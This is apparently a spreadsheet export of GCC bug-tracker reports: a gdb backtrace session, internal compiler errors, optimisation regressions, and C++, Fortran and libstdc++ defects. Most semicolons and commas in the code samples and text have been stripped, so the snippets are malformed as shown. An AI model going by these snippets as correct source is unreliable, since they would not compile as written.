Reading symbols from /lib/ld-linux-x86-64.so.2...done.
Loaded symbols for /lib64/ld-linux-x86-64.so.2
_______________________________________________________________________________
Error while running hook_stop:
Value can't be converted to integer.
0x0000000000a6ebd4 in ipa_compute_jump_functions (cs=) at ../../gcc/ipa-prop.c:437
437	  while (TREE_CODE (rhs) == SSA_NAME &amp;&amp; !SSA_NAME_IS_DEFAULT_DEF (rhs))
gdb&gt; bt ful
#0  0x0000000000a6ebd4 in ipa_compute_jump_functions (cs=) at ../../gcc/ipa-prop.c:437
	info = 
	__FUNCTION__ = ipa_compute_jump_functions
	call = 
#1  0x0000000000000002 in ?? ()
No symbol table info available.
#2  0x00007f11dcc99480 in ?? ()
No symbol table info available.
#3  0x0000000002394010 in ?? ()
No symbol table info available.
#4  0x0000000000000002 in ?? ()
No symbol table info available.
#5  0x00007f11df850360 in ?? ()
No symbol table info available.
#6  0x00007f11dd0b6c80 in ?? ()
No symbol table info available.
#7  0x00007f11dd0b6d20 in ?? ()
No symbol table info available.
#8  0x0000000002394040 in ?? ()
No symbol table info available.
#9  0x00007f11dc83b160 in ?? ()
No symbol table info available.
#10 0x00007f11ddb0f400 in ?? ()
No symbol table info available.
#11 0x00007f11dc8865a0 in ?? ()
No symbol table info available.
#12 0x000000000000003b in ?? ()
No symbol table info available.
#13 0x00007f11dd0b6d20 in ?? ()
No symbol table info available.
#14 0x00007f11dd0b6c80 in ?? ()
No symbol table info available.
#15 0x0000000000a6d0d0 in ?? ()
No locals.
#16 0x00007f11dc898600 in ?? ()
No symbol table info available.
#17 0x00007f11dc833600 in ?? ()
No symbol table info available.
#18 0x0000000000000000 in ?? ()
No symbol table info available.
gdb&gt; c
^C
Program received signal SIGINT Interrupt.
_______________________________________________________________________________
Error while running hook_stop:
Value can't be converted to integer.
gimple_assign_single_p (gs=0x7f11dc839be0) at ../../gcc/gimple.c:1831
1831	}
gdb&gt; bt 
#0  gimple_assign_single_p (gs=0x7f11dc839be0) at ../../gcc/gimple.c:1831
#1  0x0000000000a6ebee in ipa_compute_jump_functions (cs=) at ../../gcc/ipa-prop.c:441
#2  0x0000000000000002 in ?? ()
#3  0x00007f11dcc99480 in ?? ()
#4  0x0000000002394010 in ?? ()
#5  0x0000000000000002 in ?? ()
#6  0x00007f11df850360 in ?? ()
#7  0x00007f11dd0b6c80 in ?? ()
#8  0x00007f11dd0b6d20 in ?? ()
#9  0x0000000002394040 in ?? ()
#10 0x00007f11dc83b160 in ?? ()
#11 0x00007f11ddb0f400 in ?? ()
#12 0x00007f11dc8865a0 in ?? ()
#13 0x000000000000003b in ?? ()
#14 0x00007f11dd0b6d20 in ?? ()
#15 0x00007f11dd0b6c80 in ?? ()
#16 0x0000000000a6d0d0 in ?? ()
#17 0x00007f11dc898600 in ?? ()
#18 0x00007f11dc833600 in ?? ()
#19 0x0000000000000000 in ?? ()
gdb&gt; c
^C
Program received signal SIGINT Interrupt.
_______________________________________________________________________________
Error while running hook_stop:
Value can't be converted to integer.
0x0000000000a6ebdf in ipa_compute_jump_functions (cs=) at ../../gcc/ipa-prop.c:437
437	  while (TREE_CODE (rhs) == SSA_NAME &amp;&amp; !SSA_NAME_IS_DEFAULT_DEF (rhs))
gdb&gt; list
432	   return the rhs of its defining statement.  */
433	
434	static inline tree
435	get_ssa_def_if_simple_copy (tree rhs)
436	{
437	  while (TREE_CODE (rhs) == SSA_NAME &amp;&amp; !SSA_NAME_IS_DEFAULT_DEF (rhs))
438	    {
439	      gimple def_stmt = SSA_NAME_DEF_STMT (rhs)
440	
441	      if (gimple_assign_single_p (def_stmt))
gdb&gt; bt
#0  0x0000000000a6ebdf in ipa_compute_jump_functions (cs=) at ../../gcc/ipa-prop.c:437
#1  0x0000000000000002 in ?? ()
#2  0x00007f11dcc99480 in ?? ()
#3  0x0000000002394010 in ?? ()
#4  0x0000000000000002 in ?? ()
#5  0x00007f11df850360 in ?? ()
#6  0x00007f11dd0b6c80 in ?? ()
#7  0x00007f11dd0b6d20 in ?? ()
#8  0x0000000002394040 in ?? ()
#9  0x00007f11dc83b160 in ?? ()
#10 0x00007f11ddb0f400 in ?? ()
#11 0x00007f11dc8865a0 in ?? ()
#12 0x000000000000003b in ?? ()
#13 0x00007f11dd0b6d20 in ?? ()
#14 0x00007f11dd0b6c80 in ?? ()
#15 0x0000000000a6d0d0 in ?? ()
#16 0x00007f11dc898600 in ?? ()
#17 0x00007f11dc833600 in ?? ()
#18 0x0000000000000000 in ?? ()
gdb&gt; c
^C
Program received signal SIGINT Interrupt.
_______________________________________________________________________________
Error while running hook_stop:
Value can't be converted to integer.
gimple_assign_single_p (gs=0x7f11dc839be0) at ../../gcc/gimple.c:1827
1827	{
gdb&gt; list
1822	   any RHS operand including those that perform an operation
1823	   and do not have the semantics of a copy such as COND_EXPR.  */
1824	
1825	bool
1826	gimple_assign_single_p (gimple gs)
1827	{
1828	  return (gimple_code (gs) == GIMPLE_ASSIGN
1829	          &amp;&amp; get_gimple_rhs_class (gimple_assign_rhs_code (gs))
1830		     == GIMPLE_SINGLE_RHS)
1831	}
gdb&gt; print gs
$1 = (gimple) 0x7f11dc839be0
gdb&gt; print *gs
$2 = {gsbase = {code = GIMPLE_ASSIGN no_warning = 0x0 visited = 0x0 nontemporal_move = 0x0 plf = 0x0 modified = 0x0 has_volatile_ops = 0x0 pad = 0x0 subcode = 0x74 uid = 0x0 location = 0x6480dd num_ops = 0x2 bb = 0x7f11dc8865a0 block = 0x7f11dc83a120} gsops = {opbase = {gsbase = {code = GIMPLE_ASSIGN no_warning = 0x0 visited = 0x0 nontemporal_move = 0x0 plf = 0x0 modified = 0x0 has_volatile_ops = 0x0 pad = 0x0 subcode = 0x74 uid = 0x0 location = 0x6480dd num_ops = 0x2 bb = 0x7f11dc8865a0 block = 0x7f11dc83a120} def_ops = 0x7f11db7df1d0 use_ops = 0x0} op = {0x0}} gsmem = {membase = {opbase = {gsbase = {code = GIMPLE_ASSIGN no_warning = 0x0 visited = 0x0 nontemporal_move = 0x0 plf = 0x0 modified = 0x0 has_volatile_ops = 0x0 pad = 0x0 subcode = 0x74 uid = 0x0 location = 0x6480dd num_ops = 0x2 bb = 0x7f11dc8865a0 block = 0x7f11dc83a120} def_ops = 0x7f11db7df1d0 use_ops = 0x0} vdef = 0x0 vuse = 0x0} op = {0x7f11db7dccc0}} omp = {gsbase = {code = GIMPLE_ASSIGN no_warning = 0x0 visited = 0x0 nontemporal_move = 0x0 plf = 0x0 modified = 0x0 has_volatile_ops = 0x0 pad = 0x0 subcode = 0x74 uid = 0x0 location = 0x6480dd num_ops = 0x2 bb = 0x7f11dc8865a0 block = 0x7f11dc83a120} body = 0x7f11db7df1d0} gimple_bind = {gsbase = {code = GIMPLE_ASSIGN no_warning = 0x0 visited = 0x0 nontemporal_move = 0x0 plf = 0x0 modified = 0x0 has_volatile_ops = 0x0 pad = 0x0 subcode = 0x74 uid = 0x0 location = 0x6480dd num_ops = 0x2 bb = 0x7f11dc8865a0 block = 0x7f11dc83a120} vars = 0x7f11db7df1d0 block = 0x0 body = 0x0} gimple_catch = {gsbase = {code = GIMPLE_ASSIGN no_warning = 0x0 visited = 0x0 nontemporal_move = 0x0 plf = 0x0 modified = 0x0 has_volatile_ops = 0x0 pad = 0x0 subcode = 0x74 uid = 0x0 location = 0x6480dd num_ops = 0x2 bb = 0x7f11dc8865a0 block = 0x7f11dc83a120} types = 0x7f11db7df1d0 handler = 0x0} gimple_eh_filter = {gsbase = {code = GIMPLE_ASSIGN no_warning = 0x0 visited = 0x0 nontemporal_move = 0x0 plf = 0x0 modified = 0x0 has_volatile_ops = 0x0 pad = 0x0 subcode = 0x74 uid = 0x0 location = 0x6480dd num_ops = 0x2 bb = 0x7f11dc8865a0 block = 0x7f11dc83a120} types = 0x7f11db7df1d0 failure = 0x0} gimple_phi = {gsbase = {code = GIMPLE_ASSIGN no_warning = 0x0 visited = 0x0 nontemporal_move = 0x0 plf = 0x0 modified = 0x0 has_volatile_ops = 0x0 pad = 0x0 subcode = 0x74 uid = 0x0 location = 0x6480dd num_ops = 0x2 bb = 0x7f11dc8865a0 block = 0x7f11dc83a120} capacity = 0xdb7df1d0 nargs = 0x7f11 result = 0x0 args = {{imm_use = {prev = 0x0 next = 0x0 loc = {stmt = 0x7f11db7dccc0 ssa_name = 0x7f11db7dccc0} use = 0x7f11dcb59a80} def = 0x202205}}} gimple_resx = {gsbase = {code = GIMPLE_ASSIGN no_warning = 0x0 visited = 0x0 nontemporal_move = 0x0 plf = 0x0 modified = 0x0 has_volatile_ops = 0x0 pad = 0x0 subcode = 0x74 uid = 0x0 location = 0x6480dd num_ops = 0x2 bb = 0x7f11dc8865a0 block = 0x7f11dc83a120} region = 0xdb7df1d0} gimple_try = {gsbase = {code = GIMPLE_ASSIGN no_warning = 0x0 visited = 0x0 nontemporal_move = 0x0 plf = 0x0 modified = 0x0 has_volatile_ops = 0x0 pad = 0x0 subcode = 0x74 uid = 0x0 location = 0x6480dd num_ops = 0x2 bb = 0x7f11dc8865a0 block = 0x7f11dc83a120} eval = 0x7f11db7df1d0 cleanup = 0x0} gimple_wce = {gsbase = {code = GIMPLE_ASSIGN no_warning = 0x0 visited = 0x0 nontemporal_move = 0x0 plf = 0x0 modified = 0x0 has_volatile_ops = 0x0 pad = 0x0 subcode = 0x74 uid = 0x0 location = 0x6480dd num_ops = 0x2 bb = 0x7f11dc8865a0 block = 0x7f11dc83a120} cleanup = 0x7f11db7df1d0} gimple_asm = {membase = {opbase = {gsbase = {code = GIMPLE_ASSIGN no_warning = 0x0 visited = 0x0 nontemporal_move = 0x0 plf = 0x0 modified = 0x0 has_volatile_ops = 0x0 pad = 0x0 subcode = 0x74 uid = 0x0 location = 0x6480dd num_ops = 0x2 bb = 0x7f11dc8865a0 block = 0x7f11dc83a120} def_ops = 0x7f11db7df1d0 use_ops = 0x0} vdef = 0x0 vuse = 0x0} string = 0x7f11db7dccc0 \216 ni = 0x80 no = 0x9a nc = 0xdcb5 op = {0x202205}} gimple_omp_critical = {omp = {gsbase = {code = GIMPLE_ASSIGN no_warning = 0x0 visited = 0x0 nontemporal_move = 0x0 plf = 0x0 modified = 0x0 has_volatile_ops = 0x0 pad = 0x0 subcode = 0x74 uid = 0x0 location = 0x6480dd num_ops = 0x2 bb = 0x7f11dc8865a0 block = 0x7f11dc83a120} body = 0x7f11db7df1d0} name = 0x0} gimple_omp_for = {omp = {gsbase = {code = GIMPLE_ASSIGN no_warning = 0x0 visited = 0x0 nontemporal_move = 0x0 plf = 0x0 modified = 0x0 has_volatile_ops = 0x0 pad = 0x0 subcode = 0x74 uid = 0x0 location = 0x6480dd num_ops = 0x2 bb = 0x7f11dc8865a0 block = 0x7f11dc83a120} body = 0x7f11db7df1d0} clauses = 0x0 collapse = 0x0 iter = 0x0 pre_body = 0x7f11db7dccc0} gimple_omp_parallel = {omp = {gsbase = {code = GIMPLE_ASSIGN no_warning = 0x0 visited = 0x0 nontemporal_move = 0x0 plf = 0x0 modified = 0x0 has_volatile_ops = 0x0 pad = 0x0 subcode = 0x74 uid = 0x0 location = 0x6480dd num_ops = 0x2 bb = 0x7f11dc8865a0 block = 0x7f11dc83a120} body = 0x7f11db7df1d0} clauses = 0x0 child_fn = 0x0 data_arg = 0x0} gimple_omp_task = {par = {omp = {gsbase = {code = GIMPLE_ASSIGN no_warning = 0x0 visited = 0x0 nontemporal_move = 0x0 plf = 0x0 modified = 0x0 has_volatile_ops = 0x0 pad = 0x0 subcode = 0x74 uid = 0x0 location = 0x6480dd num_ops = 0x2 bb = 0x7f11dc8865a0 block = 0x7f11dc83a120} body = 0x7f11db7df1d0} clauses = 0x0 child_fn = 0x0 data_arg = 0x0} copy_fn = 0x7f11db7dccc0 arg_size = 0x7f11dcb59a80 arg_align = 0x202205} gimple_omp_sections = {omp = {gsbase = {code = GIMPLE_ASSIGN no_warning = 0x0 visited = 0x0 nontemporal_move = 0x0 plf = 0x0 modified = 0x0 has_volatile_ops = 0x0 pad = 0x0 subcode = 0x74 uid = 0x0 location = 0x6480dd num_ops = 0x2 bb = 0x7f11dc8865a0 block = 0x7f11dc83a120} body = 0x7f11db7df1d0} clauses = 0x0 control = 0x0} gimple_omp_single = {omp = {gsbase = {code = GIMPLE_ASSIGN no_warning = 0x0 visited = 0x0 nontemporal_move = 0x0 plf = 0x0 modified = 0x0 has_volatile_ops = 0x0 pad = 0x0 subcode = 0x74 uid = 0x0 location = 0x6480dd num_ops = 0x2 bb = 0x7f11dc8865a0 block = 0x7f11dc83a120} body = 0x7f11db7df1d0} clauses = 0x0} gimple_omp_continue = {gsbase = {code = GIMPLE_ASSIGN no_warning = 0x0 visited = 0x0 nontemporal_move = 0x0 plf = 0x0 modified = 0x0 has_volatile_ops = 0x0 pad = 0x0 subcode = 0x74 uid = 0x0 location = 0x6480dd num_ops = 0x2 bb = 0x7f11dc8865a0 block = 0x7f11dc83a120} control_def = 0x7f11db7df1d0 control_use = 0x0} gimple_omp_atomic_load = {gsbase = {code = GIMPLE_ASSIGN no_warning = 0x0 visited = 0x0 nontemporal_move = 0x0 plf = 0x0 modified = 0x0 has_volatile_ops = 0x0 pad = 0x0 subcode = 0x74 uid = 0x0 location = 0x6480dd num_ops = 0x2 bb = 0x7f11dc8865a0 block = 0x7f11dc83a120} rhs = 0x7f11db7df1d0 lhs = 0x0} gimple_omp_atomic_store = {gsbase = {code = GIMPLE_ASSIGN no_warning = 0x0 visited = 0x0 nontemporal_move = 0x0 plf = 0x0 modified = 0x0 has_volatile_ops = 0x0 pad = 0x0 subcode = 0x74 uid = 0x0 location = 0x6480dd num_ops = 0x2 bb = 0x7f11dc8865a0 block = 0x7f11dc83a120} val = 0x7f11db7df1d0}}
gdb&gt;</t>
  </si>
  <si>
    <t>GCC-29175</t>
  </si>
  <si>
    <t>[4.0 regression] ICE on invalid C++ variable length array</t>
  </si>
  <si>
    <t>Compiling this invalid C++ code with current mainline:
void foo() { static int c = 2 static const char *a[][c] = { { 1 2 } } }
gives me:
foo.cc: In function â€˜void foo()â€™:
foo.cc:1: internal compiler error: in tree_low_cst at tree.c:4519
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
It should instead say something along the lines of
foo.cc:1: error: array bound is not an integer constant</t>
  </si>
  <si>
    <t>GCC-19828</t>
  </si>
  <si>
    <t>[4.0 Regression] LIM is pulling out a pure function even though there is something which can modify global memory</t>
  </si>
  <si>
    <t>Take the following program it should run and work correct and not call abort but with -O1/-O2 on the 
mainline we call abort because LIM pulls out the call to f of the loop but should not because f1 can 
modify the global memory (and does).  If I uncomment the store to the global memory in the function 
containing the loop we get the correct code as LIM sees that the call to f has a VUSE and call to f1 has a 
V_MAY_DEF.
int f(void) __attribute__((pure))
int lll
int f() { return lll }
int f1() { lll++ return lll % 2}
int g(void)
{
  int k l
  k=0
//lll = 0
  for(l =0l&lt;10l++)
    if (f1 ())
     k = f()
  return k
}
void abort ()
int main(void)
{
  if (g() != 9)
   abort ()
}</t>
  </si>
  <si>
    <t>GCC-40823</t>
  </si>
  <si>
    <t>debug info points to unexpected line</t>
  </si>
  <si>
    <t>the observation is that profiling tools (like callgrind/valgrind) will assign a fraction of the instructions to line 2 (PUBLIC S1) in a profile similarly a debugger will jump to line 2 if one steps through the execution of this program.   This is not particularly intuitive (since this line just specifies an attribute and is not executed) and doesn't happen if e.g. ifort is used for compilation.
MODULE M1
 PUBLIC S1
CONTAINS
 SUBROUTINE S1(An)
  INTEGER :: n
  INTEGER :: A(nnnn)
  A(1111)=0
 END SUBROUTINE S1
END MODULE M1
PROGRAM TEST
  USE M1
  INTEGER :: A(2222)i
  DO i=110000000
     CALL S1(A2)
  ENDDO
END PROGRAM TEST</t>
  </si>
  <si>
    <t>GCC-4458</t>
  </si>
  <si>
    <t>std::ctype::is doesn't call do_is as required by ISO 14882</t>
  </si>
  <si>
    <t>std::ctype::is doesn't call the virtual function
do_is as required by the standard.  This means that
the programmer cannot derive from std::ctype::is
in order to create his own locales (or since the existing
implementation of the function doesn't work to provide one
that does).
Release:
g++ 3.0
Environment:
    dxcs8h@~/tmp/gcc (164): uname -a
    SunOS dxcs8h 5.7 Generic_106541-12 sun4u sparc SUNWUltra-60
    dxcs8h@~/tmp/gcc (165): /opt/global/pkg/gcc-3.0.0_threads/bin/g++ --version
    3.0 
    dxcs8h@~/tmp/gcc (166): env | egrep LC_
    LC_MESSAGES=C
    LC_TIME=en_US
    LC_NUMERIC=en_US
    LC_CTYPE=iso_8859_1
    LC_MONETARY=en_US
    LC_COLLATE=en_US
How-To-Repeat:
Compile then look at the output under Private CType.</t>
  </si>
  <si>
    <t>kanze</t>
  </si>
  <si>
    <t>GCC-53227</t>
  </si>
  <si>
    <t>[4.8 Regression] FAIL: gcc.target/i386/movbe-2.c scan-assembler-times movbe[ \t] 4</t>
  </si>
  <si>
    <t>Split from PR 53176 that changed lower-subreg to not split subregs early on x86.
Following testcase
--cut here--
extern long long x
void
foo (long long i)
{
  x = __builtin_bswap64 (i)
}
long long
bar ()
{
  return __builtin_bswap64 (x)
}
--cut here--
compiled with -O2 -mmovbe -m32 on x86 target triggers RA to allocate non-optimal registers for foo (and forcing reload) while it is able to allocate optimal regs for bar case:
bar:
        movbe   x+4 %eax
        movbe   x %edx
        ret
The situation with foo:
foo:
        pushl   %ebx
        movl    8(%esp) %eax
        movl    12(%esp) %edx
        movl    %eax %ebx
        movl    %edx %ecx
        bswap   %ebx
        bswap   %ecx
        movl    %ebx x+4
        movl    %ecx x
        popl    %ebx
        ret
Which is a noticeable regression from 4.7:
foo:
        movbe   4(%esp) %eax
        movbe   8(%esp) %edx
        movl    %eax x+4
        movl    %edx x
        ret
Adding -mregparm=2 does not improve things:
foo:
        pushl   %ebx
        movl    %edx %ecx
        movl    %eax %ebx
        bswap   %ecx
        bswap   %ebx
        movl    %ecx x
        movl    %ebx x+4
        popl    %ebx
        ret
while 4.7 generates:
foo:
        movbe   %edx x
        movbe   %eax x+4
        ret</t>
  </si>
  <si>
    <t>GCC-4166</t>
  </si>
  <si>
    <t>recursive member template call fails to compile</t>
  </si>
  <si>
    <t>First my apologies if this report pertains to the known limitation
Two stage lookup in templates is not implemented.   I am not smart
enough to know whether this is a two stage template lookup problem.
Perhaps your website should give an example of such a problem.
When I compile the attached self contained program which features
a member template for which an instantiation will call itself recursively
compilation fails with the following error message:
gisli.cxx: In method `T *A::exhaustive_search (int) const [with T = 
B]':
gisli.cxx:72:   instantiated from here
gisli.cxx:56: no matching function for call to `A::exhaustive_search 
(int &amp;)'
For what it is worth the program compiles and runs with recent SGI
IBM and HP C++ compilers.
Release:
unknown
Environment:
~ &gt; gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000731 (Red Hat Linux 7.1 2.96-85)
How-To-Repeat:
g++ gisli.cxx</t>
  </si>
  <si>
    <t>gisli</t>
  </si>
  <si>
    <t>GCC-31050</t>
  </si>
  <si>
    <t>[4.1] gcc --version reports wrong year.</t>
  </si>
  <si>
    <t>As per a message by David Taylor on gcc-patches gcc --version reports the wrong copyright year:
&gt; ../bin-4.2/bin/gcc --version
gcc (GCC) 4.2.0 20070305 (prerelease)
Copyright (C) 2006 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
He proposes a patch but notes that he does not have access to the repository see:
http://gcc.gnu.org/ml/gcc-patches/2007-03/msg00296.html</t>
  </si>
  <si>
    <t>GCC-27855</t>
  </si>
  <si>
    <t>[6/7/8 regression] reassociation causes the RA to be confused</t>
  </si>
  <si>
    <t>The testcase from PR target/27827 shows another problem this time with -ffast-math. The runtime performance of -ffast-math code drops for ~30%.
The problem could be traced down to reassociation tree pass because the performance jumps back when flag_unsafe_math_optimizations switch is disabled by changing every occurence in tree-ssa-reassoc.c with (flag_unsafe_math_optimizations &amp;&amp; 0).
To see the problem -funsafe-math-optimizations should be added to MMFLAGS in target/27827 example Makefile:
MM4FLAGS = $(GMMFLAGS) -funsafe-math-optimizations
Current mainline gcc produces code with following results:
-O -mfpmath=387
ALGORITHM     NB   REPS        TIME      MFLOPS
=========  =====  =====  ==========  ==========
atlasmm       60   1000       0.260     1663.04
-O -msse2 -mfpmath=sse
ALGORITHM     NB   REPS        TIME      MFLOPS
=========  =====  =====  ==========  ==========
atlasmm       60   1000       0.229     1890.47
gcc with disabled reassoc pass for floating point values:
-O -mfpmath=387
ALGORITHM     NB   REPS        TIME      MFLOPS
=========  =====  =====  ==========  ==========
atlasmm       60   1000       0.162     2664.87
-O -msse2 -mfpmath=sse
ALGORITHM     NB   REPS        TIME      MFLOPS
=========  =====  =====  ==========  ==========
atlasmm       60   1000       0.164     2633.15</t>
  </si>
  <si>
    <t>GCC-59935</t>
  </si>
  <si>
    <t>[4.9 Regression] Firefox build fails with: : internal compiler error: Segmentation fault</t>
  </si>
  <si>
    <t>markus@x4 src % gcc -P --save-temps -O3 -o cairo-ft-font.o -c -I../../../../dist/system_wrappers -include /var/tmp/mozilla-central/config/gcc_hidden.h -DPACKAGE_VERSION='moz' -DPACKAGE_BUGREPORT='http://bugzilla.mozilla.org/' -DCAIRO_HAS_PTHREAD -D_GNU_SOURCE -DMOZ_TREE_CAIRO -DMOZ_TREE_PIXMAN -DMOZ_GLUE_IN_PROGRAM -DNO_NSPR_10_SUPPORT -I/var/tmp/mozilla-central/gfx/cairo/cairo/src -I. -I../../../../dist/include -I/var/tmp/moz-build-dir/dist/include/nspr -I/var/tmp/moz-build-dir/dist/include/nss -I/usr/include/freetype2 -I/usr/include/freetype2 -fPIC -include ../../../../mozilla-config.h -DMOZILLA_CLIENT -MD -MP -MF .deps/cairo-ft-font.o.pp -Wall -Wpointer-arith -Wdeclaration-after-statement -Werror=return-type -Werror=int-to-pointer-cast -Wtype-limits -Wempty-body -Wsign-compare -Wno-unused -Wcast-align -march=native -std=gnu99 -fgnu89-inline -fno-strict-aliasing -fno-math-errno -pthread -pipe -DNDEBUG -DTRIMMED -O3 -fomit-frame-pointer -Wno-missing-field-initializers -Wno-conversion /var/tmp/mozilla-central/gfx/cairo/cairo/src/cairo-ft-font.c
gcc: warning: -pipe ignored because -save-temps specified
/var/tmp/mozilla-central/gfx/cairo/cairo/src/cairo-ft-font.c:64:0: warning: _GNU_SOURCE redefined [enabled by default]
 #define _GNU_SOURCE /* for RTLD_DEFAULT */
 ^
:0:0: note: this is the location of the previous definition
: internal compiler error: Segmentation fault
0x99c78f crash_signal
        ../../gcc/gcc/toplev.c:337
0xf0d0a7 add_file_to_cache_tab
        ../../gcc/gcc/input.c:296
0xf0d0a7 lookup_or_add_file_to_cache_tab
        ../../gcc/gcc/input.c:330
0xf0d0a7 location_get_source_line(expanded_location int*)
        ../../gcc/gcc/input.c:704
0xf07feb diagnostic_show_locus(diagnostic_context* diagnostic_info const*)
        ../../gcc/gcc/diagnostic.c:304
0xf0902b diagnostic_report_diagnostic(diagnostic_context* diagnostic_info*)
        ../../gcc/gcc/diagnostic.c:800
0x5cde84 c_cpp_error(cpp_reader* int int unsigned int unsigned int char const* __va_list_tag (*) [1])
        ../../gcc/gcc/c-family/c-common.c:9638
0xf17856 cpp_error_with_line(cpp_reader* int unsigned int unsigned int char const* ...)
        ../../gcc/libcpp/errors.c:163
0xf278ff _cpp_create_definition
        ../../gcc/libcpp/macro.c:3124
0xf14051 do_define
        ../../gcc/libcpp/directives.c:584
0xf15887 _cpp_handle_directive
        ../../gcc/libcpp/directives.c:492
0xf223dc _cpp_lex_token
        ../../gcc/libcpp/lex.c:2067
0xf26fcf cpp_get_token_1
        ../../gcc/libcpp/macro.c:2362
0x5e9d5f scan_translation_unit
        ../../gcc/gcc/c-family/c-ppoutput.c:176
0x5e9d5f preprocess_file(cpp_reader*)
        ../../gcc/gcc/c-family/c-ppoutput.c:101
0x5e8778 c_common_init()
        ../../gcc/gcc/c-family/c-opts.c:1040
0x57ad4d c_objc_common_init()
        ../../gcc/gcc/c/c-objc-common.c:65
0x99e7e6 lang_dependent_init
        ../../gcc/gcc/toplev.c:1712
0x99e7e6 do_compile
        ../../gcc/gcc/toplev.c:1900
Perhaps not surprisingly compiling the preprocessed file works fine. 
Started with r206957.</t>
  </si>
  <si>
    <t>GCC-35719</t>
  </si>
  <si>
    <t>pointer to zero sized array not associated</t>
  </si>
  <si>
    <t>The ASSOCIATED function returns FALSE when its argument is a
pointer to a zero-sized array.
Dick Hendrickson
      program try_mf1053
! fails on Windows XP
! gcc version 4.4.0 20080312 (experimental) [trunk revision 133139]
      call       mf1053 (  1   2   3   4)
      end
      SUBROUTINE MF1053 (nf1 nf2 nf3 nf4)
      INTEGER pointer :: ILA(::)
      INTEGER target  :: ILA1(NF2NF4:NF3)
      ILA =&gt; ILA1
      if (ASSOCIATED (ILA ILA1(NF1:NF2NF4:NF3) ) ) print * 1 bad
      if ( .not. ASSOCIATED(ILA) )  print * 2 bad
      END SUBROUTINE
C:\g_experiments\gfortran&gt;gfortran mf1053.f
C:\g_experiments\gfortran&gt;a
 2 bad</t>
  </si>
  <si>
    <t>GCC-1950</t>
  </si>
  <si>
    <t>GCC cross build fails</t>
  </si>
  <si>
    <t>Attempting to build a GCC cross compiler causes internal compiler error - see attached log. The files in directory /home/mherring/src are the current (2.94.2) gcc-core sources.
Reading specs from /usr/lib/gcc-lib/i686-pc-cygwin/2.95.2-6/specs
gcc version 2.95.2-6 19991024 (cygwin experimental)
Release:
2.95.2
Environment:
Cygwin on Win ME
How-To-Repeat:
Run build-cross.sh as per instructions at www.objsw.com/CrossGCC/FAQ-4.html</t>
  </si>
  <si>
    <t>malcolm.herring</t>
  </si>
  <si>
    <t>GCC-70538</t>
  </si>
  <si>
    <t>ICE on a deprecated access declaration in instantiate_template_1 at cp/pt.c:17310</t>
  </si>
  <si>
    <t>While attempting to emit a diagnostic following this warning
  x.ii:11:3: warning: access declarations are deprecated in favour of using-declarations suggestion: add the â€˜usingâ€™ keyword [-Wdeprecated]
gcc reaches a gcc_unreachable call at gcc/cp/pt.c:17317:
17312         /* Look for the clone.  */
17313         FOR_EACH_CLONE (clone spec)
17314           if (DECL_NAME (clone) == DECL_NAME (tmpl))
17315             return clone
17316         /* We should always have found the clone by now.  */
17317         gcc_unreachable ()
17318         return NULL_TREE
Here is a 'creduce'd input that triggers that error:
$ g++ --version|head -1 &amp;&amp; cat x.ii &amp;&amp; ./cc1plus x.ii
g++ (GCC) 6.0.0 20160405 (experimental)
struct A
template  class C
using PathComponentPiece = C
class B {
  B(int)
  template  B(T)
  B(C)
}
template  class C : B {
  using base_type = B
  base_type::base_type
  PathComponentPiece m_fn1() {}
}
x.ii:11:3: warning: access declarations are deprecated in favour of using-declarations suggestion: add the â€˜usingâ€™ keyword [-Wdeprecated]
   base_type::base_type
   ^~~~~~~~~
x.ii: In substitution of â€˜template C::C(T) [with T = int]â€™:
x.ii:11:14:   recursively required by substitution of â€˜template C::C(T) [with T = int]â€™
x.ii:11:14:   required from â€˜class Câ€™
x.ii:12:30:   required from here
x.ii:11:14: internal compiler error: in instantiate_template_1 at cp/pt.c:17317
   base_type::base_type
              ^~~~~~~~~
0x62362a instantiate_template_1
        ../../gcc/cp/pt.c:17317
0x623a1c instantiate_template(tree_node* tree_node* int)
        ../../gcc/cp/pt.c:17449
0x624326 fn_type_unification(tree_node* tree_node* tree_node* tree_node* const* unsigned int tree_node* unification_kind_t int bool bool)
        ../../gcc/cp/pt.c:17808
0x5d085d add_template_candidate_real
        ../../gcc/cp/call.c:3089
0x5d0fbc add_template_candidate
        ../../gcc/cp/call.c:3171
0x5d0fbc add_candidates
        ../../gcc/cp/call.c:5344
0x5ce443 build_user_type_conversion_1
        ../../gcc/cp/call.c:3687
0x5cee30 implicit_conversion
        ../../gcc/cp/call.c:1863
0x5d02b8 add_function_candidate
        ../../gcc/cp/call.c:2121
0x5d0f5f add_candidates
        ../../gcc/cp/call.c:5354
0x5d14f4 build_new_method_call_1
        ../../gcc/cp/call.c:8293
0x5d14f4 build_new_method_call(tree_node* tree_node* vec** tree_node* int tree_node** int)
        ../../gcc/cp/call.c:8489
0x6b5bce locate_fn_flags
        ../../gcc/cp/method.c:900
0x6b65d8 synthesized_method_walk
        ../../gcc/cp/method.c:1477
0x6b6f54 deduce_inheriting_ctor(tree_node*)
        ../../gcc/cp/method.c:1711
0x61273c tsubst_decl
        ../../gcc/cp/pt.c:11941
0x614b94 tsubst(tree_node* tree_node* int tree_node*)
        ../../gcc/cp/pt.c:12817
0x6238b5 instantiate_template_1
        ../../gcc/cp/pt.c:17398
0x623a1c instantiate_template(tree_node* tree_node* int)
        ../../gcc/cp/pt.c:17449
0x623480 instantiate_template_1
        ../../gcc/cp/pt.c:17307
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-47957</t>
  </si>
  <si>
    <t>[4.3 Regression] Type mismatch when a class derived a same name with template parameter</t>
  </si>
  <si>
    <t>This bug report is for gcc 4.6(built in 2011/02/26)
I tried other version(gcc 4.1). But it doesn't have this problem.
struct Base
{
    typedef int T 
} 
template 
struct Derived : Base
{
    T member  // T is Base::T its type is int.
    void f()
    {// for instantiation Derived
        // type of T is double
        std::cout &lt;&lt; T=  &lt;&lt; typeid(T).name() &lt;&lt; std::endl 
        T variable 
        // type of variable is double
        std::cout &lt;&lt; variable=  &lt;&lt; typeid(variable).name() &lt;&lt; std::endl 
        // type of member is int
        std::cout &lt;&lt; member=  &lt;&lt; typeid(member).name() &lt;&lt; std::endl 
    }
}
int main()
{
    Derived d 
    d.f() 
}
